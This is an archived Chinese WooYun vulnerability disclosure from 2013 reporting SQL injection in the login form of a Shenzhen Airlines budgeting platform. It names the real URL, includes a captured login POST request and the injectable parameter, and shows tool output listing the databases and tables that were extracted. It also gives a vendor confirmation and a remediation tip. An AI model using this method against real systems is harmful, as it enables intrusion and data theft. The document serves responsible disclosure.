乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-10-18: 细节已通知厂商并且等待厂商处理中 2013-10-18: 厂商已经确认,细节仅向厂商公开 2013-10-28: 细节向核心白帽子及相关领域专家公开 2013-11-07: 细节向普通白帽子公开 2013-11-17: 细节向实习白帽子公开 2013-12-02: 细节向公众公开
哇咔咔,ATM来了!
漏洞系统地址:全面预算应用平台 aspx+oracle
http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx
登陆处没有做过滤,导致登陆框注入。抓登陆包。
POST /QMYS/Web/LoginCheck.aspx HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*Referer: http://cw-info.shenzhenair.com/QMYS/Web/Login.aspxAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)Host: cw-info.shenzhenair.comContent-Length: 76Proxy-Connection: Keep-AlivePragma: no-cacheCookie: ASP.NET_SessionId=rivobj21bxefuf55b3q1em55; Seeyon_Q_Cookies=GUID_IP=fe2cab85-abf0-4c5b-b665-2742c5a8c42fF_DLM=admin&F_MM=admin&statedatetime=Fri+Oct+18+10%3A26%3A13+UTC%2B0800+2013
F_DLM参数存在注入。
注入得到的数据库:
available databases [3]:[*] CWYS2[*] SYS[*] SYSTEMcurrent schema (equivalent to database on Oracle): 'CWYS2'
当前数据库CWYS2的表有300多个,不读取了,你们速度修复吧。
[10:30:02] [INFO] the SQL query used returns 369 entries[10:30:03] [INFO] retrieved: TB_ZX_SKDWXXB_20110112[10:30:04] [INFO] retrieved: TB_ZX_BDMXB_20110112[10:30:04] [INFO] retrieved: TB_ZX_BDZB_20110112[10:30:06] [INFO] retrieved: XY_DEL_ZX_BDZB[10:30:07] [INFO] retrieved: TB_ZX_YHFKDFPXX[10:30:08] [INFO] retrieved: TMP_XX[10:30:08] [INFO] retrieved: NS_STATS[10:30:09] [INFO] retrieved: TB_XT_GNML_20101008[10:30:10] [INFO] retrieved: TB_YS_YSNDTXB_20101008[10:30:10] [INFO] retrieved: TB_YS_NDHZB_20130106[10:30:11] [INFO] retrieved: TB_YS_YSBDMXB_20100628
见详细说明。
0x1:任何用户输入,都要过滤了。0x2:求20rank
危害等级:高
漏洞Rank:20
确认时间:2013-10-18 14:02
感谢您对深航信息系统的关注和帮助,我们将尽快排查程序修补漏洞。
暂无